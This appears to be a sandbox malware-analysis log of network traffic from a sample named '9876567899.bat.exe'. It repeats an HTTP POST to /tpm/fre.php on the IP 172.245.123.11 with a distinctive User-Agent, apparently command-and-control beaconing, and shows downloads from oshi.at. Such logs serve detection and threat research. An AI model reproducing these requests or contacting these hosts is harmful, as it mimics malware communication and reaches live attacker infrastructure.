                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 153Connection: close
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_0078CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_0078CE44
                Source: global trafficHTTP traffic detected: GET /rtBS?N HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: oshi.atConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /BLZu HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: oshi.atConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: oshi.at
                Source: unknownHTTP traffic detected: POST /tpm/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 172.245.123.11Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D3AFB906Content-Length: 180Connection: close
